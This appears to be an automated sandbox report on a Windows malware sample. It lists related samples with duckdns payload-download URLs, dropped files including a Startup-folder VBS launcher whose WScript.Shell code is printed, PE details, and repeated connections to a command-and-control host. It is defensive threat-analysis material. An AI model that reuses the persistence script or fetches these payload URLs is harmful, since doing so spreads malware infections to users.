      192.169.69.252AE575F006FC418C72A55EC5FDC26BC821AA3929114EE.exeGet hashmaliciousBrowse
      • http://192.169.69.25/fakeurl.htm
      1F7E9C6AED2B8CB929E3677818BD2B72142254E17F790.exeGet hashmaliciousBrowse
      • strserver1.duckdns.org:8001/is-ready
      F4yQKL3fUH.exeGet hashmaliciousBrowse
      • alphaputin.duckdns.org/og/charly.bin
      orCJlXSGOG.exeGet hashmaliciousBrowse
      • alphaputin.duckdns.org/og/charly.bin
      PO20171118-COGRAL SPA.jarGet hashmaliciousBrowse
      • pluginsrv1.duckdns.org:7756/is-ready
      New Order_R4.jarGet hashmaliciousBrowse
      • pluginsrv1.duckdns.org:7756/is-ready
      10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exeGet hashmaliciousBrowse
      • http://192.169.69.25/fakeurl.htm
      66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exeGet hashmaliciousBrowse
      • ipvhosted.duckdns.org/rmarch/fre.php
      ttmPnejtED.jsGet hashmaliciousBrowse
      • pluginsrv.duckdns.org:7744/is-ready
      New Order.xlsxGet hashmaliciousBrowse
      • systemserverrootmapforfiletrn.duckdns.org/explorer/black.exe
      Your Transport Plan has Changed - Maersk.xlsxGet hashmaliciousBrowse
      • covidinternationalspreadsoomuchtruehead.duckdns.org/covid/blk.exe
      XQqVczq7eQ.exeGet hashmaliciousBrowse
      • wetransferfax.duckdns.org/sftp.exe
      http://office365update.duckdns.orgGet hashmaliciousBrowse
      • office365update.duckdns.org/
      TUdme7rF2G.rtfGet hashmaliciousBrowse
      • wsdykungcommunicationtarisupliermg55gms.duckdns.org/kungdoc/winlog.exe
      http://communicationideadedicatedserversystem.duckdns.org/bns/vbc.exeGet hashmaliciousBrowse
      • communicationideadedicatedserversystem.duckdns.org/bns/vbc.exe
      doc04483720200602121810.xlsxGet hashmaliciousBrowse
      • honeysposecurityfileexchangeservice.duckdns.org/org/vbc.exe
      doc04483720200602121810.xlsxGet hashmaliciousBrowse
      • honeysposecurityfileexchangeservice.duckdns.org/org/vbc.exe
      BBVA-Confirming Facturas Pagadas al Vencimiento.xlsxGet hashmaliciousBrowse
      • mkpksb2overhypetheykillppelforlifehelgg.duckdns.org/mkpk2doc/regasm.exe
      VqtnFLslNj_Purchase Order.vbsGet hashmaliciousBrowse
      • onyeeze.duckdns.org:5000/is-ready
      1.bin.jsGet hashmaliciousBrowse
      • unknownsoft.duckdns.org:7755/is-ready

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      WOWUSmeihao.sh4Get hashmaliciousBrowse
      • 216.176.191.230
      yM7xvqb6OL.exeGet hashmaliciousBrowse
      • 192.169.69.26
      9BBAF063C0F092D248C755107F8BA10DFF6739A805F95.exeGet hashmaliciousBrowse
      • 192.169.69.26
      NzDRLmVUQh.exeGet hashmaliciousBrowse
      • 192.169.69.26
      Pm5WshbKaz.exeGet hashmaliciousBrowse
      • 192.169.69.25
      SecuriteInfo.com.Trojan.AutoIt.833.17587.exeGet hashmaliciousBrowse
      • 192.169.69.25
      https://www.portablefreeware.com/?id=693Get hashmaliciousBrowse
      • 23.138.32.193
      F60FA93B7851B48E141C57BAC40D8846BE4B3FF3A9EC6.exeGet hashmaliciousBrowse
      • 192.169.69.25
      FA57F7CBA4406D815947A3A2481842F6B0E1C6D82CB3E.exeGet hashmaliciousBrowse
      • 192.169.69.25
      i586-20220412-0247Get hashmaliciousBrowse
      • 208.115.121.73
      6C64CD522D7E6F3C0B6F0116271CDE81E35213AD4A360.exeGet hashmaliciousBrowse
      • 192.169.69.26
      fhGFK34M3e.exeGet hashmaliciousBrowse
      • 192.169.69.25
      5058533554DC63236F5945969A20574DF2E2B44982553.exeGet hashmaliciousBrowse
      • 192.169.69.25
      2409D1664AD7CBBE19B0991D4BF92303DDA0DE873508E.exeGet hashmaliciousBrowse
      • 192.169.69.25
      AQMWbVdilDGet hashmaliciousBrowse
      • 208.87.97.14
      microsoft.htaGet hashmaliciousBrowse
      • 192.169.69.26
      armGet hashmaliciousBrowse
      • 208.115.121.78
      54C1F3123187554C4637A2D0AB80ABFD06A27D61BB72D.exeGet hashmaliciousBrowse
      • 192.169.69.25
      HHq5dFupRq.exeGet hashmaliciousBrowse
      • 192.169.69.25
      5A8A49E14822787A453E28BB2F0782B91E2A1C7C00720.exeGet hashmaliciousBrowse
      • 192.169.69.25

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1216
      Entropy (8bit):5.355304211458859
      Encrypted:false
      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
      MD5:69206D3AF7D6EFD08F4B4726998856D3
      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      File Type:data
      Category:dropped
      Size (bytes):8
      Entropy (8bit):3.0
      Encrypted:false
      SSDEEP:3:Ll:Ll
      MD5:B0D520A58AFBB2268CEB35E278A4EB33
      SHA1:15B41F5F9DC6456482F03330B5450F3C0784F9A3
      SHA-256:D9BE84474B3876A55B0D1BD3971001A9F50C7F3039CEE9C09209C74E9C2BD316
      SHA-512:7E91CC1295EA5B68E151795ED5D6EC93105546405C02C56DC4A459A47865610D164D40635A0E01F91C4B4F63C353BEA0E7947DD4236BD189231235D0B66C605B
      Malicious:true
      Reputation:low
      Preview:f..dF9.H

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs

      Download File
      Process:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File Type:data
      Category:dropped
      Size (bytes):304
      Entropy (8bit):3.410548573208775
      Encrypted:false
      SSDEEP:6:xPW+YR4lAINl1fYlfm3OOQd4l1RIlRKUEZglJPZ60mlRA6DA6nMWl1fYlxCv:xQ4lAN0+vcIlRKMJelRRFSji
      MD5:36615C3E591704897CAC5551FFD58553
      SHA1:ABDC43118D030E3716FA302B5E6B5AA6D7FD3C72
      SHA-256:CF648418AC15FCD4CD81C2AD4E289F149B52FCA8A6198F39EFBE52D71C602B04
      SHA-512:ACE72BF54585FD266CCD8732146C8D1BCE5E4731EC44C18A005759622C938D34C435BED0EAC1EEECCAC732EC1C125566862748B101383BAE8D2C16B45525F1D7
      Malicious:true
      Reputation:low
      Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .S.h.e.l.l.V.a.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...S.h.e.l.l.V.a.r...E.x.e.c.(.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.e.t.w.a.\.o.p.l.e...e.x.e...e.x.e.".)...S.e.t.S.h.e.l.l.V.a.r. .=.N.o.t.h.i.n.g.

      C:\Users\user\AppData\Roaming\etwa\ople.exe.exe

      Download File
      Process:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):409170
      Entropy (8bit):7.3076840802364
      Encrypted:false
      SSDEEP:6144:PuWieVAGW6qGWdFlnHCDFrNAiX1AS0mrSMnBX21Cjna06R8fpR4Qq3fS:PVl+nHAZ19RrSMdd6qFyS
      MD5:CA51A0A9E3EF192B26D9818DC4EC5FF0
      SHA1:7D56B8436D501E6CDA892E61FA29BEEEDF65DA0E
      SHA-256:D0250A0B19CC73D8E6A4C97EA7935BA06BA70DD1FB9EEA8C44AEA396DD792A6E
      SHA-512:1997CFD7D25FFE7BB59A9C8A6F7E009D4B693FF4019B0E6698CEFE9FEBD393848C5F4DE9DD3025354E4059EAAD0B29CE2D3B141ED4586B1C7C8DB76303582F15
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: ReversingLabs, Detection: 63%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f...........8h.....8h......8h.....!......!......!......8h............9......9............9......Rich....................PE..L......]............................."............@.......................................@..................................!.......`..........................8...P...............................p...@............................................text...G........................... ..`.rdata..(Z.......\..................@..@.data........0....... ..............@....gfids.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):7.307692888739697
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File size:409169
      MD5:a93162e62b49a591e0d481e030ffc9ea
      SHA1:b0c48a0fc418977051bea837c16aa7928f654da7
      SHA256:692bb93169319eba2f556174d781a8636d610a67e6838e19300a8a2454cd8b2b
      SHA512:2f5c74acd25c9a7fae88736e25e526155d09d5c1c0f66c833c8e6e0c3dfd74fd7d53438089d5de5a07fd2935a78a27a13d3d6ddeef020d42ecafb38497926c25
      SSDEEP:6144:PuWieVAGW6qGWdFlnHCDFrNAiX1AS0mrSMnBX21Cjna06R8fpR4Qq3fm:PVl+nHAZ19RrSMdd6qFym
      TLSH:E3949D52F29698A5E426B1F8A8359D32122B7D9558348A0B31BB312D4E733D3DC77E0F
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f.............8h......8h......8h......!.......!.......!.......8h..............9.......9...............9.......Rich...........

      File Icon

      Icon Hash:4552445c54463289

      Static PE Info

      General

      Entrypoint:0x402212
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x5DDBF1DC [Mon Nov 25 15:23:08 2019 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:695a88385098872b689faf1f231ef8ea

      Entrypoint Preview

      Instruction
      call 00007FBE38700972h
      jmp 00007FBE3870058Dh
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007FBE3870071Bh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007FBE3870070Ch
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007FBE3870070Eh
      add edx, 28h
      cmp edx, esi
      jne 00007FBE387006ECh
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007FBE387006FBh
      call 00007FBE38700E4Fh
      test eax, eax
      jne 00007FBE38700705h
      xor al, al
      ret
      mov eax, dword ptr fs:[00000018h]
      push esi
      mov esi, 00413794h
      mov edx, dword ptr [eax+04h]
      jmp 00007FBE38700706h
      cmp edx, eax
      je 00007FBE38700712h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      jne 00007FBE387006F2h
      xor al, al
      pop esi
      ret
      mov al, 01h
      pop esi
      ret
      push ebp
      mov ebp, esp
      cmp dword ptr [ebp+08h], 00000000h
      jne 00007FBE38700709h
      mov byte ptr [004137B0h], 00000001h
      call 00007FBE38700C66h
      call 00007FBE387010ECh
      test al, al
      jne 00007FBE38700706h
      xor al, al
      pop ebp
      ret
      call 00007FBE38702A00h
      test al, al
      jne 00007FBE3870070Ch
      push 00000000h
      call 00007FBE387010FDh
      pop ecx
      jmp 00007FBE387006EBh
      mov al, 01h
      pop ebp
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      push esi
      mov esi, dword ptr [ebp+08h]
      test esi, esi

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x121140xb4.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x18b90.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000xe38.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x11a500x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11a700x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0xd0000x1b8.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000xbf470xc000False0.579060872396data6.64391063708IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .rdata0xd0000x5a280x5c00False0.417246942935data4.87173398485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x130000x11b80x800False0.17236328125DOS executable (block device driver \277DN)2.05377921789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .gfids0x150000xac0x200False0.271484375data1.40558316368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .rsrc0x160000x18b900x18c00False0.210611979167data4.88160389879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x2f0000xe380x1000False0.744140625data6.17873004973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x164b80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
      RT_ICON0x169200x10a8dataEnglishUnited States
      RT_ICON0x179c80x25a8dataEnglishUnited States
      RT_ICON0x19f700x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0EnglishUnited States
      RT_ICON0x1e1980x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 33554431, next used block 33554431EnglishUnited States
      RT_GROUP_ICON0x2e9c00x4cdataEnglishUnited States
      RT_VERSION0x161f00x2c8dataEnglishUnited States
      RT_MANIFEST0x2ea100x17dXML 1.0 document textEnglishUnited States

      Imports

      DLLImport
      KERNEL32.dllVirtualProtect, GetConsoleWindow, CreateFileW, DecodePointer, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, GetStringTypeW, GetFileType, SetStdHandle, LCMapStringW, CompareStringW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, FindClose, CloseHandle, HeapAlloc, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetACP, HeapFree, RaiseException
      imagehlp.dllUnDecorateSymbolName, SymGetSymFromAddr64
      MAPI32.dll
      USER32.dllGetAncestor, SetWindowPos, ChangeMenuA, BroadcastSystemMessage, SubtractRect, IsDialogMessageA, CountClipboardFormats
      mscms.dllDeleteColorTransform, InstallColorProfileA, SetColorProfileHeader, GetPS2ColorRenderingIntent, SetColorProfileElementReference
      WINSPOOL.DRVEnumPrinterDataW, OpenPrinterA, EnumPrinterKeyA
      ODBC32.dll
      msi.dll

      Version Infos

      DescriptionData
      LegalCopyrightCopyright (C) land-born 2019
      InternalNamecardsharper.exe
      FileVersion8.2.1.4
      CompanyNamevanes
      ProductNameaggeration
      ProductVersion7.6.0.2
      FileDescriptionspermary
      OriginalFilenameunobservant.exe
      Translation0x0409 0x04b0

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      May 19, 2022 05:19:35.391271114 CEST497605626192.168.2.4192.169.69.25
      May 19, 2022 05:19:35.604505062 CEST562649760192.169.69.25192.168.2.4
      May 19, 2022 05:19:35.604670048 CEST497605626192.168.2.4192.169.69.25
      May 19, 2022 05:19:35.661648035 CEST497605626192.168.2.4192.169.69.25
      May 19, 2022 05:19:35.899727106 CEST562649760192.169.69.25192.168.2.4
      May 19, 2022 05:19:40.045200109 CEST497615626192.168.2.4192.169.69.25
      May 19, 2022 05:19:40.334722042 CEST562649761192.169.69.25192.168.2.4
      May 19, 2022 05:19:40.334908962 CEST497615626192.168.2.4192.169.69.25
      May 19, 2022 05:19:40.355438948 CEST497615626192.168.2.4192.169.69.25
      May 19, 2022 05:19:40.629517078 CEST562649761192.169.69.25192.168.2.4
      May 19, 2022 05:19:44.675549030 CEST497625626192.168.2.4192.169.69.25
      May 19, 2022 05:19:44.999265909 CEST562649762192.169.69.25192.168.2.4
      May 19, 2022 05:19:44.999759912 CEST497625626192.168.2.4192.169.69.25
      May 19, 2022 05:19:45.004966021 CEST497625626192.168.2.4192.169.69.25
      May 19, 2022 05:19:45.291423082 CEST562649762192.169.69.25192.168.2.4
      May 19, 2022 05:20:04.840961933 CEST497745626192.168.2.4192.169.69.25
      May 19, 2022 05:20:05.154113054 CEST562649774192.169.69.25192.168.2.4
      May 19, 2022 05:20:05.154316902 CEST497745626192.168.2.4192.169.69.25
      May 19, 2022 05:20:05.161387920 CEST497745626192.168.2.4192.169.69.25
      May 19, 2022 05:20:05.464230061 CEST562649774192.169.69.25192.168.2.4
      May 19, 2022 05:20:09.601588964 CEST497755626192.168.2.4192.169.69.25
      May 19, 2022 05:20:09.902873039 CEST562649775192.169.69.25192.168.2.4
      May 19, 2022 05:20:09.903219938 CEST497755626192.168.2.4192.169.69.25
      May 19, 2022 05:20:09.904114008 CEST497755626192.168.2.4192.169.69.25
      May 19, 2022 05:20:10.191227913 CEST562649775192.169.69.25192.168.2.4
      May 19, 2022 05:20:14.236185074 CEST497765626192.168.2.4192.169.69.25
      May 19, 2022 05:20:14.530116081 CEST562649776192.169.69.25192.168.2.4
      May 19, 2022 05:20:14.530278921 CEST497765626192.168.2.4192.169.69.25
      May 19, 2022 05:20:14.530742884 CEST497765626192.168.2.4192.169.69.25
      May 19, 2022 05:20:14.815737009 CEST562649776192.169.69.25192.168.2.4
      May 19, 2022 05:20:34.964564085 CEST498295626192.168.2.4192.169.69.25
      May 19, 2022 05:20:35.244076967 CEST562649829192.169.69.25192.168.2.4
      May 19, 2022 05:20:35.244360924 CEST498295626192.168.2.4192.169.69.25
      May 19, 2022 05:20:35.251326084 CEST498295626192.168.2.4192.169.69.25
      May 19, 2022 05:20:35.520592928 CEST562649829192.169.69.25192.168.2.4
      May 19, 2022 05:20:39.559667110 CEST498375626192.168.2.4192.169.69.25
      May 19, 2022 05:20:39.872410059 CEST562649837192.169.69.25192.168.2.4
      May 19, 2022 05:20:39.872554064 CEST498375626192.168.2.4192.169.69.25
      May 19, 2022 05:20:39.873094082 CEST498375626192.168.2.4192.169.69.25
      May 19, 2022 05:20:40.164750099 CEST562649837192.169.69.25192.168.2.4
      May 19, 2022 05:20:44.291788101 CEST498395626192.168.2.4192.169.69.25
      May 19, 2022 05:20:44.577816963 CEST562649839192.169.69.25192.168.2.4
      May 19, 2022 05:20:44.579777002 CEST498395626192.168.2.4192.169.69.25
      May 19, 2022 05:20:44.602205038 CEST498395626192.168.2.4192.169.69.25
      May 19, 2022 05:20:44.877954006 CEST562649839192.169.69.25192.168.2.4
      May 19, 2022 05:21:04.218692064 CEST498665626192.168.2.4192.169.69.25
      May 19, 2022 05:21:04.455672026 CEST562649866192.169.69.25192.168.2.4
      May 19, 2022 05:21:04.455786943 CEST498665626192.168.2.4192.169.69.25
      May 19, 2022 05:21:04.458276033 CEST498665626192.168.2.4192.169.69.25
      May 19, 2022 05:21:04.747319937 CEST562649866192.169.69.25192.168.2.4
      May 19, 2022 05:21:08.868937969 CEST498695626192.168.2.4192.169.69.25
      May 19, 2022 05:21:09.173266888 CEST562649869192.169.69.25192.168.2.4
      May 19, 2022 05:21:09.173451900 CEST498695626192.168.2.4192.169.69.25
      May 19, 2022 05:21:09.174114943 CEST498695626192.168.2.4192.169.69.25
      May 19, 2022 05:21:09.475833893 CEST562649869192.169.69.25192.168.2.4
      May 19, 2022 05:21:13.529231071 CEST498715626192.168.2.4192.169.69.25
      May 19, 2022 05:21:13.753601074 CEST562649871192.169.69.25192.168.2.4
      May 19, 2022 05:21:13.753717899 CEST498715626192.168.2.4192.169.69.25
      May 19, 2022 05:21:13.763097048 CEST498715626192.168.2.4192.169.69.25
      May 19, 2022 05:21:14.037683010 CEST562649871192.169.69.25192.168.2.4

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      May 19, 2022 05:19:35.271678925 CEST6050653192.168.2.48.8.8.8
      May 19, 2022 05:19:35.380067110 CEST53605068.8.8.8192.168.2.4
      May 19, 2022 05:19:39.935419083 CEST6427753192.168.2.48.8.8.8
      May 19, 2022 05:19:40.044132948 CEST53642778.8.8.8192.168.2.4
      May 19, 2022 05:19:44.650464058 CEST5607653192.168.2.48.8.8.8
      May 19, 2022 05:19:44.667726994 CEST53560768.8.8.8192.168.2.4
      May 19, 2022 05:20:04.727262020 CEST6038153192.168.2.48.8.8.8
      May 19, 2022 05:20:04.837091923 CEST53603818.8.8.8192.168.2.4
      May 19, 2022 05:20:09.485280991 CEST5650953192.168.2.48.8.8.8
      May 19, 2022 05:20:09.593802929 CEST53565098.8.8.8192.168.2.4
      May 19, 2022 05:20:14.216454983 CEST5406953192.168.2.48.8.8.8
      May 19, 2022 05:20:14.234416008 CEST53540698.8.8.8192.168.2.4
      May 19, 2022 05:20:34.752480030 CEST6149753192.168.2.48.8.8.8
      May 19, 2022 05:20:34.861716032 CEST53614978.8.8.8192.168.2.4
      May 19, 2022 05:20:39.538358927 CEST6041853192.168.2.48.8.8.8
      May 19, 2022 05:20:39.558176041 CEST53604188.8.8.8192.168.2.4
      May 19, 2022 05:20:44.182333946 CEST6425953192.168.2.48.8.8.8
      May 19, 2022 05:20:44.290632010 CEST53642598.8.8.8192.168.2.4
      May 19, 2022 05:21:04.108495951 CEST5871553192.168.2.48.8.8.8
      May 19, 2022 05:21:04.217644930 CEST53587158.8.8.8192.168.2.4
      May 19, 2022 05:21:08.758953094 CEST5781653192.168.2.48.8.8.8
      May 19, 2022 05:21:08.867835999 CEST53578168.8.8.8192.168.2.4
      May 19, 2022 05:21:13.507783890 CEST5391653192.168.2.48.8.8.8
      May 19, 2022 05:21:13.527236938 CEST53539168.8.8.8192.168.2.4

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      May 19, 2022 05:19:35.271678925 CEST192.168.2.48.8.8.80x19ecStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:19:39.935419083 CEST192.168.2.48.8.8.80x5d07Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:19:44.650464058 CEST192.168.2.48.8.8.80x6fcfStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:04.727262020 CEST192.168.2.48.8.8.80xf60bStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:09.485280991 CEST192.168.2.48.8.8.80x474Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:14.216454983 CEST192.168.2.48.8.8.80x37aStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:34.752480030 CEST192.168.2.48.8.8.80xd39fStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:39.538358927 CEST192.168.2.48.8.8.80x6194Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:44.182333946 CEST192.168.2.48.8.8.80x4b2cStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:04.108495951 CEST192.168.2.48.8.8.80x30eaStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:08.758953094 CEST192.168.2.48.8.8.80xa247Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:13.507783890 CEST192.168.2.48.8.8.80x5cdeStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      May 19, 2022 05:19:35.380067110 CEST8.8.8.8192.168.2.40x19ecNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:19:40.044132948 CEST8.8.8.8192.168.2.40x5d07No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:19:44.667726994 CEST8.8.8.8192.168.2.40x6fcfNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:04.837091923 CEST8.8.8.8192.168.2.40xf60bNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:09.593802929 CEST8.8.8.8192.168.2.40x474No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:14.234416008 CEST8.8.8.8192.168.2.40x37aNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:34.861716032 CEST8.8.8.8192.168.2.40xd39fNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:39.558176041 CEST8.8.8.8192.168.2.40x6194No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:44.290632010 CEST8.8.8.8192.168.2.40x4b2cNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
